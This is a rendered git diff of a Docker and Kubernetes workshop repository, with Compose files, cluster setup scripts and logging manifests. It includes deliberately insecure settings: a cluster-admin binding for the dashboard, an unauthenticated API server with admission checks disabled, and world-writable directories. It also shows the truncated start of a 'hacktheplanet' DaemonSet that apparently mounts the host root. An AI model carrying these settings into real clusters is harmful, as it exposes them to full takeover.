config = ComposeFile()
# The ambassadors need to know the service port to use.
# Those ports must be declared here.
ports = yaml.load(open("ports.yml"))
def generate_local_addr():
last_byte = 2
while last_byte<255:
yield "127.127.0.{}".format(last_byte)
last_byte += 1
for service_name, service in config.services.items():
if "links" in service:
for link, local_addr in zip(service["links"], generate_local_addr()):
if link not in ports:
print("Skipping link {} in service {} "
"(no port mapping defined). "
"Your code will probably break."
.format(link, service_name))
continue
if "extra_hosts" not in service:
service["extra_hosts"] = {}
service["extra_hosts"][link] = local_addr
del service["links"]
if "ports" in service:
del service["ports"]
if "volumes" in service:
del service["volumes"]
if service_name in ports:
service["ports"] = [ ports[service_name] ]
config.save()

View File

@@ -0,0 +1,46 @@
#!/usr/bin/env python
# FIXME: hardcoded
PORT="80"
import os
import subprocess
project_name = os.path.basename(os.path.realpath("."))
# Get all existing services for this application.
containers_data = subprocess.check_output([
"docker", "ps",
"--filter", "label=com.docker.compose.project={}".format(project_name),
"--format", '{{ .Label "com.docker.compose.service" }} '
'{{ .Label "com.docker.compose.container-number" }} '
'{{ .Label "loadbalancer" }}',
])
load_balancers = dict()
for line in containers_data.split('\n'):
if not line:
continue
service_name, container_number, load_balancer = line.split(' ')
if load_balancer:
if load_balancer not in load_balancers:
load_balancers[load_balancer] = []
load_balancers[load_balancer].append((service_name, int(container_number)))
for load_balancer, backends in load_balancers.items():
# FIXME: iterate on all load balancers
container_name = "{}_{}_1".format(project_name, load_balancer)
command = [
"docker", "run", "--rm",
"--volumes-from", container_name,
"--net", "container:{}".format(container_name),
"jpetazzo/hamba", "reconfigure", PORT,
]
command.extend(
"{}_{}_{}:{}".format(project_name, backend_name, backend_number, PORT)
for (backend_name, backend_number) in sorted(backends)
)
print("Updating configuration for {} with {} backend(s)..."
.format(container_name, len(backends)))
subprocess.check_output(command)

201
bin/setup-all-the-things.sh Executable file
View File

@@ -0,0 +1,201 @@
#!/bin/sh
unset DOCKER_REGISTRY
unset DOCKER_HOST
unset COMPOSE_FILE
SWARM_IMAGE=${SWARM_IMAGE:-swarm}
prepare_1_check_ssh_keys () {
for N in $(seq 1 5); do
ssh node$N true
done
}
prepare_2_compile_swarm () {
cd ~
git clone git://github.com/docker/swarm
cd swarm
[[ -z "$1" ]] && {
echo "Specify which revision to build."
return
}
git checkout "$1" || return
mkdir -p image
docker build -t docker/swarm:$1 .
docker run -i --entrypoint sh docker/swarm:$1 \
-c 'cat $(which swarm)' > image/swarm
chmod +x image/swarm
cat >image/Dockerfile <<EOF
FROM scratch
COPY ./swarm /swarm
ENTRYPOINT ["/swarm", "-debug", "-experimental"]
EOF
docker build -t jpetazzo/swarm:$1 image
docker login
docker push jpetazzo/swarm:$1
docker logout
SWARM_IMAGE=jpetazzo/swarm:$1
}
clean_1_containers () {
for N in $(seq 1 5); do
ssh node$N "docker ps -aq | xargs -r -n1 -P10 docker rm -f"
done
}
clean_2_volumes () {
for N in $(seq 1 5); do
ssh node$N "docker volume ls -q | xargs -r docker volume rm"
done
}
clean_3_images () {
for N in $(seq 1 5); do
ssh node$N "docker images | awk '/dockercoins|jpetazzo/ {print \$1\":\"\$2}' | xargs -r docker rmi -f"
done
}
clean_4_machines () {
rm -rf ~/.docker/machine/
}
clean_all () {
clean_1_containers
clean_2_volumes
clean_3_images
clean_4_machines
}
dm_swarm () {
eval $(docker-machine env node1 --swarm)
}
dm_node1 () {
eval $(docker-machine env node1)
}
setup_1_swarm () {
grep node[12345] /etc/hosts | grep -v ^127 |
while read IPADDR NODENAME; do
docker-machine create --driver generic \
--engine-opt cluster-store=consul://localhost:8500 \
--engine-opt cluster-advertise=eth0:2376 \
--swarm --swarm-master --swarm-image $SWARM_IMAGE \
--swarm-discovery consul://localhost:8500 \
--swarm-opt replication --swarm-opt advertise=$IPADDR:3376 \
--generic-ssh-user docker --generic-ip-address $IPADDR $NODENAME
done
}
setup_2_consul () {
IPADDR=$(ssh node1 ip a ls dev eth0 |
sed -n 's,.*inet \(.*\)/.*,\1,p')
for N in 1 2 3 4 5; do
ssh node$N -- docker run -d --restart=always --name consul_node$N \
-e CONSUL_BIND_INTERFACE=eth0 --net host consul \
agent -server -retry-join $IPADDR -bootstrap-expect 5 \
-ui -client 0.0.0.0
done
}
setup_3_wait () {
# Wait for a Swarm master
dm_swarm
while ! docker ps; do sleep 1; done
# Wait for all nodes to be there
while ! [ "$(docker info | grep "^Nodes:")" = "Nodes: 5" ]; do sleep 1; done
}
setup_4_registry () {
cd ~/orchestration-workshop/registry
dm_swarm
docker-compose up -d
for N in $(seq 2 5); do
docker-compose scale frontend=$N
done
}
setup_5_btp_dockercoins () {
cd ~/orchestration-workshop/dockercoins
dm_node1
export DOCKER_REGISTRY=localhost:5000
cp docker-compose.yml-v2 docker-compose.yml
~/orchestration-workshop/bin/build-tag-push.py | tee /tmp/btp.log
export $(tail -n 1 /tmp/btp.log)
}
setup_6_add_lbs () {
cd ~/orchestration-workshop/dockercoins
~/orchestration-workshop/bin/add-load-balancer-v2.py rng
~/orchestration-workshop/bin/add-load-balancer-v2.py hasher
}
setup_7_consulfs () {
dm_swarm
docker pull jpetazzo/consulfs
for N in $(seq 1 5); do
ssh node$N "docker run --rm -v /usr/local/bin:/target jpetazzo/consulfs"
ssh node$N mkdir -p ~/consul
ssh -f node$N "mountpoint ~/consul || consulfs localhost:8500 ~/consul"
done
}
setup_8_syncmachine () {
while ! mountpoint ~/consul; do
sleep 1
done
cp -r ~/.docker/machine ~/consul/
for N in $(seq 2 5); do
ssh node$N mkdir -p ~/.docker
ssh node$N "[ -L ~/.docker/machine ] || ln -s ~/consul/machine ~/.docker"
done
}
setup_9_elk () {
dm_swarm
cd ~/orchestration-workshop/elk
docker-compose up -d
for N in $(seq 1 5); do
docker-compose scale logstash=$N
done
}
setup_all () {
setup_1_swarm
setup_2_consul
setup_3_wait
setup_4_registry
setup_5_btp_dockercoins
setup_6_add_lbs
setup_7_consulfs
setup_8_syncmachine
dm_swarm
}
force_remove_network () {
dm_swarm
NET="$1"
for CNAME in $(docker network inspect $NET | grep Name | grep -v \"$NET\" | cut -d\" -f4); do
echo $CNAME
docker network disconnect -f $NET $CNAME
done
docker network rm $NET
}
demo_1_compose_up () {
dm_swarm
cd ~/orchestration-workshop/dockercoins
docker-compose up -d
}
grep -qs -- MAGICMARKER "$0" && { # Don't display this line in the function lis
echo "You should source this file, then invoke the following functions:"
grep -- '^[a-z].*{$' "$0" | cut -d" " -f1
}
show_swarm_primary () {
dm_swarm
docker info 2>/dev/null | grep -e ^Role -e ^Primary
}

View File

@@ -0,0 +1,12 @@
version: "2"
services:
cadvisor:
image: google/cadvisor
ports:
- "8080:8080"
volumes:
- "/:/rootfs:ro"
- "/var/run:/var/run:rw"
- "/sys:/sys:ro"
- "/var/lib/docker/:/var/lib/docker:ro"

19
ceph/README.md Normal file
View File

@@ -0,0 +1,19 @@
# CEPH on Docker
Note: this doesn't quite work yet.
The OSD containers need to be started twice (the first time, they fail
initializing; second time is a champ).
Also, it looks like you need at least two OSD containers (or the OSD
container should have two disks/directories, whatever).
RadosGw is listening on port 8080.
The `admin` container will create a `docker` user using `radosgw-admin`.
If you run it multiple times, that's OK: further invocations are idempotent.
Last but not least: it looks like AWS CLI uses a new signature format
that doesn't work with RadosGW. After almost two hours trying to figure
out what was wrong, I tried the S3 credentials directly with boto and
it worked immediately (I was able to create a bucket).

53
ceph/docker-compose.yml Normal file
View File

@@ -0,0 +1,53 @@
version: "2"
services:
mon:
image: ceph/daemon
command: mon
environment:
CEPH_PUBLIC_NETWORK: 10.33.0.0/16
MON_IP: 10.33.0.2
osd:
image: ceph/daemon
command: osd_directory
depends_on:
- mon
volumes_from:
- mon
volumes:
- /var/lib/ceph/osd
mds:
image: ceph/daemon
command: mds
environment:
CEPHFS_CREATE: 1
depends_on:
- mon
volumes_from:
- mon
rgw:
image: ceph/daemon
command: rgw
depends_on:
- mon
volumes_from:
- mon
environment:
CEPH_OPTS: --verbose
admin:
image: ceph/daemon
entrypoint: radosgw-admin
depends_on:
- mon
volumes_from:
- mon
command: user create --uid=docker --display-name=docker
networks:
default:
ipam:
driver: default
config:
- subnet: 10.33.0.0/16
gateway: 10.33.0.1

View File

@@ -1,9 +0,0 @@
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout

View File

@@ -1,2 +0,0 @@
hostname frr
log stdout

View File

@@ -1,34 +0,0 @@
version: "3"
services:
bgpd:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
restart: always
zebra:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh -c "show ip bgp"
chmod:
image: alpine
volumes:
- ./run:/var/run/frr
command: chmod 777 /var/run/frr

View File

@@ -1,29 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.3.10
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-scheduler --master http://localhost:8080

View File

@@ -1,128 +0,0 @@
---
apiVersion: |+
Make sure you update the line with --master=http://X.X.X.X:8080 below.
Then remove this section from this YAML file and try again.
---
apiVersion: v1
kind: ConfigMap
metadata:
name: kube-router-cfg
namespace: kube-system
labels:
tier: node
k8s-app: kube-router
data:
cni-conf.json: |
{
"cniVersion":"0.3.0",
"name":"mynet",
"plugins":[
{
"name":"kubernetes",
"type":"bridge",
"bridge":"kube-bridge",
"isDefaultGateway":true,
"ipam":{
"type":"host-local"
}
}
]
}
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
labels:
k8s-app: kube-router
tier: node
name: kube-router
namespace: kube-system
spec:
template:
metadata:
labels:
k8s-app: kube-router
tier: node
annotations:
scheduler.alpha.kubernetes.io/critical-pod: ''
spec:
serviceAccountName: kube-router
containers:
- name: kube-router
image: docker.io/cloudnativelabs/kube-router
imagePullPolicy: Always
args:
- "--run-router=true"
- "--run-firewall=true"
- "--run-service-proxy=true"
- "--master=http://X.X.X.X:8080"
env:
- name: NODE_NAME
valueFrom:
fieldRef:
fieldPath: spec.nodeName
- name: KUBE_ROUTER_CNI_CONF_FILE
value: /etc/cni/net.d/10-kuberouter.conflist
livenessProbe:
httpGet:
path: /healthz
port: 20244
initialDelaySeconds: 10
periodSeconds: 3
resources:
requests:
cpu: 250m
memory: 250Mi
securityContext:
privileged: true
volumeMounts:
- name: lib-modules
mountPath: /lib/modules
readOnly: true
- name: cni-conf-dir
mountPath: /etc/cni/net.d
initContainers:
- name: install-cni
image: busybox
imagePullPolicy: Always
command:
- /bin/sh
- -c
- set -e -x;
if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
if [ -f /etc/cni/net.d/*.conf ]; then
rm -f /etc/cni/net.d/*.conf;
fi;
TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
cp /etc/kube-router/cni-conf.json ${TMP};
mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
fi
volumeMounts:
- mountPath: /etc/cni/net.d
name: cni-conf-dir
- mountPath: /etc/kube-router
name: kube-router-cfg
hostNetwork: true
tolerations:
- key: CriticalAddonsOnly
operator: Exists
- effect: NoSchedule
key: node-role.kubernetes.io/master
operator: Exists
- effect: NoSchedule
key: node.kubernetes.io/not-ready
operator: Exists
volumes:
- name: lib-modules
hostPath:
path: /lib/modules
- name: cni-conf-dir
hostPath:
path: /etc/cni/net.d
- name: kube-router-cfg
configMap:
name: kube-router-cfg

View File

@@ -1,28 +0,0 @@
version: "3"
services:
pause:
ports:
- 8080:8080
image: k8s.gcr.io/pause
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.3.10
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.14.0
command: kube-scheduler --master http://localhost:8080

12
consul/docker-compose.yml Normal file
View File

@@ -0,0 +1,12 @@
version: "2"
services:
bootstrap:
image: jpetazzo/consul
command: agent -server -bootstrap
container_name: bootstrap
server:
image: jpetazzo/consul
command: agent -server -join bootstrap -join server
client:
image: jpetazzo/consul
command: members -rpc-addr server:8400

View File

@@ -1,5 +1,5 @@
FROM ruby:alpine
RUN apk add --update build-base curl
RUN apk add --update build-base
RUN gem install sinatra
RUN gem install thin
ADD hasher.rb /

View File

@@ -28,5 +28,5 @@ def rng(how_many_bytes):
if __name__ == "__main__":
app.run(host="0.0.0.0", port=80, threaded=False)
app.run(host="0.0.0.0", port=80)

View File

@@ -50,7 +50,7 @@ function refresh () {
points.push({ x: s2.now, y: speed });
}
$("#speed").text("~" + speed.toFixed(1) + " hashes/second");
var msg = ("I'm attending a @docker orchestration workshop, "
var msg = ("I'm attending the @docker workshop at #LinuxCon, "
+ "and my #DockerCoins mining rig is crunching "
+ speed.toFixed(1) + " hashes/second! W00T!");
$("#tweet").attr(

View File

Before

Width:  |  Height:  |  Size: 15 KiB

After

Width:  |  Height:  |  Size: 15 KiB

9
docs/chat/index.html Normal file
View File

@@ -0,0 +1,9 @@
<html>
<!-- Generated with index.html.sh -->
<head>
<meta http-equiv="refresh" content="0; URL='https://dockercommunity.slack.com/messages/docker-mentor'" />
</head>
<body>
<a href="https://dockercommunity.slack.com/messages/docker-mentor">https://dockercommunity.slack.com/messages/docker-mentor</a>
</body>
</html>

16
docs/chat/index.html.sh Executable file
View File

@@ -0,0 +1,16 @@
#!/bin/sh
#LINK=https://gitter.im/jpetazzo/workshop-20170322-sanjose
LINK=https://dockercommunity.slack.com/messages/docker-mentor
#LINK=https://usenix-lisa.slack.com/messages/docker
sed "s,@@LINK@@,$LINK,g" >index.html <<EOF
<html>
<!-- Generated with index.html.sh -->
<head>
<meta http-equiv="refresh" content="0; URL='$LINK'" />
</head>
<body>
<a href="$LINK">$LINK</a>
</body>
</html>
EOF

View File

Before

Width:  |  Height:  |  Size: 15 KiB

After

Width:  |  Height:  |  Size: 15 KiB

View File

Before

Width:  |  Height:  |  Size: 26 KiB

After

Width:  |  Height:  |  Size: 26 KiB

View File

Before

Width:  |  Height:  |  Size: 680 KiB

After

Width:  |  Height:  |  Size: 680 KiB

View File

Before

Width:  |  Height:  |  Size: 137 KiB

After

Width:  |  Height:  |  Size: 137 KiB

View File

Before

Width:  |  Height:  |  Size: 252 KiB

After

Width:  |  Height:  |  Size: 252 KiB

View File

Before

Width:  |  Height:  |  Size: 213 KiB

After

Width:  |  Height:  |  Size: 213 KiB

View File

Before

Width:  |  Height:  |  Size: 901 KiB

After

Width:  |  Height:  |  Size: 901 KiB

View File

Before

Width:  |  Height:  |  Size: 575 KiB

After

Width:  |  Height:  |  Size: 575 KiB

View File

Before

Width:  |  Height:  |  Size: 205 KiB

After

Width:  |  Height:  |  Size: 205 KiB

BIN
docs/extra-details.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 11 KiB

19
docs/extract-section-titles.py Executable file
View File

@@ -0,0 +1,19 @@
#!/usr/bin/env python
"""
Extract and print level 1 and 2 titles from workshop slides.
"""
separators = [
"---",
"--"
]
slide_count = 1
for line in open("index.html"):
line = line.strip()
if line in separators:
slide_count += 1
if line.startswith('# '):
print slide_count, '# #', line
elif line.startswith('# '):
print slide_count, line

View File

Before

Width:  |  Height:  |  Size: 147 KiB

After

Width:  |  Height:  |  Size: 147 KiB

View File

Before

Width:  |  Height:  |  Size: 145 KiB

After

Width:  |  Height:  |  Size: 145 KiB

7557
docs/index.html Normal file

File diff suppressed because it is too large Load Diff

View File

Before

Width:  |  Height:  |  Size: 24 KiB

After

Width:  |  Height:  |  Size: 24 KiB

View File

Before

Width:  |  Height:  |  Size: 145 KiB

After

Width:  |  Height:  |  Size: 145 KiB

View File

Before

Width:  |  Height:  |  Size: 41 KiB

After

Width:  |  Height:  |  Size: 41 KiB

View File

Before

Width:  |  Height:  |  Size: 42 KiB

After

Width:  |  Height:  |  Size: 42 KiB

View File

Before

Width:  |  Height:  |  Size: 18 KiB

After

Width:  |  Height:  |  Size: 18 KiB

View File

Before

Width:  |  Height:  |  Size: 59 KiB

After

Width:  |  Height:  |  Size: 59 KiB

View File

Before

Width:  |  Height:  |  Size: 48 KiB

After

Width:  |  Height:  |  Size: 48 KiB

View File

Before

Width:  |  Height:  |  Size: 266 KiB

After

Width:  |  Height:  |  Size: 266 KiB

View File

Before

Width:  |  Height:  |  Size: 1.2 MiB

After

Width:  |  Height:  |  Size: 1.2 MiB

View File

Before

Width:  |  Height:  |  Size: 15 KiB

After

Width:  |  Height:  |  Size: 15 KiB

View File

Before

Width:  |  Height:  |  Size: 53 KiB

After

Width:  |  Height:  |  Size: 53 KiB

View File

@@ -2,14 +2,14 @@ version: "2"
services:
elasticsearch:
image: elasticsearch:2
image: elasticsearch
# If you need to access ES directly, just uncomment those lines.
#ports:
# - "9200:9200"
# - "9300:9300"
logstash:
image: logstash:2
image: logstash
command: |
-e '
input {
@@ -47,7 +47,7 @@ services:
- "12201:12201/udp"
kibana:
image: kibana:4
image: kibana
ports:
- "5601:5601"
environment:

View File

@@ -1,90 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: consul
labels:
app: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
labels:
app: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.4.4"
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- consul leave

View File

@@ -1,28 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: build-image
spec:
restartPolicy: OnFailure
containers:
- name: docker-build
image: docker
env:
- name: REGISTRY_PORT
value: #"30000"
command: ["sh", "-c"]
args:
- |
apk add --no-cache git &&
mkdir /workspace &&
git clone https://github.com/jpetazzo/container.training /workspace &&
docker build -t localhost:$REGISTRY_PORT/worker /workspace/dockercoins/worker &&
docker push localhost:$REGISTRY_PORT/worker
volumeMounts:
- name: docker-socket
mountPath: /var/run/docker.sock
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock

View File

@@ -1,167 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: fluentd
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: fluentd
rules:
- apiGroups:
- ""
resources:
- pods
- namespaces
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: fluentd
roleRef:
kind: ClusterRole
name: fluentd
apiGroup: rbac.authorization.k8s.io
subjects:
- kind: ServiceAccount
name: fluentd
namespace: default
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: fluentd
labels:
app: fluentd
spec:
template:
metadata:
labels:
app: fluentd
spec:
serviceAccount: fluentd
serviceAccountName: fluentd
tolerations:
- key: node-role.kubernetes.io/master
effect: NoSchedule
containers:
- name: fluentd
image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
env:
- name: FLUENT_ELASTICSEARCH_HOST
value: "elasticsearch"
- name: FLUENT_ELASTICSEARCH_PORT
value: "9200"
- name: FLUENT_ELASTICSEARCH_SCHEME
value: "http"
- name: FLUENT_UID
value: "0"
- name: FLUENTD_SYSTEMD_CONF
value: "disable"
- name: FLUENTD_PROMETHEUS_CONF
value: "disable"
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 200Mi
volumeMounts:
- name: varlog
mountPath: /var/log
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
terminationGracePeriodSeconds: 30
volumes:
- name: varlog
hostPath:
path: /var/log
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
labels:
app: elasticsearch
name: elasticsearch
spec:
selector:
matchLabels:
app: elasticsearch
template:
metadata:
labels:
app: elasticsearch
spec:
containers:
- image: elasticsearch:5
name: elasticsearch
resources:
limits:
memory: 2Gi
requests:
memory: 1Gi
env:
- name: ES_JAVA_OPTS
value: "-Xms1g -Xmx1g"
---
apiVersion: v1
kind: Service
metadata:
labels:
app: elasticsearch
name: elasticsearch
spec:
ports:
- port: 9200
protocol: TCP
targetPort: 9200
selector:
app: elasticsearch
type: ClusterIP
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
labels:
app: kibana
name: kibana
spec:
selector:
matchLabels:
app: kibana
template:
metadata:
labels:
app: kibana
spec:
containers:
- env:
- name: ELASTICSEARCH_URL
value: http://elasticsearch:9200/
image: kibana:5
name: kibana
resources: {}
---
apiVersion: v1
kind: Service
metadata:
labels:
app: kibana
name: kibana
spec:
ports:
- port: 5601
protocol: TCP
targetPort: 5601
selector:
app: kibana
type: NodePort

View File

@@ -1,21 +0,0 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
name: es
spec:
kibana:
image: docker.elastic.co/kibana/kibana-oss:6.1.3
image-pull-policy: Always
cerebro:
image: upmcenterprises/cerebro:0.7.2
image-pull-policy: Always
elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
image-pull-policy: Always
client-node-replicas: 2
master-node-replicas: 3
data-node-replicas: 3
network-host: 0.0.0.0
use-ssl: false
data-volume-size: 10Gi
java-options: "-Xms512m -Xmx512m"

View File

@@ -1,94 +0,0 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
resources: ["customresourcedefinitions"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
resources: ["storageclasses"]
verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
resources: ["cronjobs", "jobs"]
verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
resources: ["statefulsets", "deployments"]
verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
resources: ["elasticsearchclusters"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: elasticsearch-operator
subjects:
- kind: ServiceAccount
name: elasticsearch-operator
namespace: elasticsearch-operator
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: elasticsearch-operator
namespace: elasticsearch-operator
spec:
replicas: 1
template:
metadata:
labels:
name: elasticsearch-operator
spec:
containers:
- name: operator
image: upmcenterprises/elasticsearch-operator:0.2.0
imagePullPolicy: Always
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
ports:
- containerPort: 8000
name: http
livenessProbe:
httpGet:
path: /live
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 10
readinessProbe:
httpGet:
path: /ready
port: 8000
initialDelaySeconds: 10
timeoutSeconds: 5
serviceAccount: elasticsearch-operator

View File

@@ -1,167 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-config
namespace: kube-system
labels:
k8s-app: filebeat
data:
filebeat.yml: |-
filebeat.config:
inputs:
# Mounted `filebeat-inputs` configmap:
path: ${path.config}/inputs.d/*.yml
# Reload inputs configs as they change:
reload.enabled: false
modules:
path: ${path.config}/modules.d/*.yml
# Reload module configs as they change:
reload.enabled: false
# To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
#filebeat.autodiscover:
# providers:
# - type: kubernetes
# hints.enabled: true
processors:
- add_cloud_metadata:
cloud.id: ${ELASTIC_CLOUD_ID}
cloud.auth: ${ELASTIC_CLOUD_AUTH}
output.elasticsearch:
hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
username: ${ELASTICSEARCH_USERNAME}
password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
name: filebeat-inputs
namespace: kube-system
labels:
k8s-app: filebeat
data:
kubernetes.yml: |-
- type: docker
containers.ids:
- "*"
processors:
- add_kubernetes_metadata:
in_cluster: true
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
spec:
template:
metadata:
labels:
k8s-app: filebeat
spec:
serviceAccountName: filebeat
terminationGracePeriodSeconds: 30
containers:
- name: filebeat
image: docker.elastic.co/beats/filebeat-oss:7.0.1
args: [
"-c", "/etc/filebeat.yml",
"-e",
]
env:
- name: ELASTICSEARCH_HOST
value: elasticsearch-es.default.svc.cluster.local
- name: ELASTICSEARCH_PORT
value: "9200"
- name: ELASTICSEARCH_USERNAME
value: elastic
- name: ELASTICSEARCH_PASSWORD
value: changeme
- name: ELASTIC_CLOUD_ID
value:
- name: ELASTIC_CLOUD_AUTH
value:
securityContext:
runAsUser: 0
# If using Red Hat OpenShift uncomment this:
#privileged: true
resources:
limits:
memory: 200Mi
requests:
cpu: 100m
memory: 100Mi
volumeMounts:
- name: config
mountPath: /etc/filebeat.yml
readOnly: true
subPath: filebeat.yml
- name: inputs
mountPath: /usr/share/filebeat/inputs.d
readOnly: true
- name: data
mountPath: /usr/share/filebeat/data
- name: varlibdockercontainers
mountPath: /var/lib/docker/containers
readOnly: true
volumes:
- name: config
configMap:
defaultMode: 0600
name: filebeat-config
- name: varlibdockercontainers
hostPath:
path: /var/lib/docker/containers
- name: inputs
configMap:
defaultMode: 0600
name: filebeat-inputs
# data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
- name: data
hostPath:
path: /var/lib/filebeat-data
type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: filebeat
subjects:
- kind: ServiceAccount
name: filebeat
namespace: kube-system
roleRef:
kind: ClusterRole
name: filebeat
apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
name: filebeat
labels:
k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
resources:
- namespaces
- pods
verbs:
- get
- watch
- list
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: filebeat
namespace: kube-system
labels:
k8s-app: filebeat
---

View File

@@ -1,14 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: kubernetes-dashboard
labels:
k8s-app: kubernetes-dashboard
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: cluster-admin
subjects:
- kind: ServiceAccount
name: kubernetes-dashboard
namespace: kube-system

View File

@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hacktheplanet
spec:
selector:
matchLabels:
app: hacktheplanet
template:
metadata:
labels:
app: hacktheplanet
spec:
volumes:
- name: root
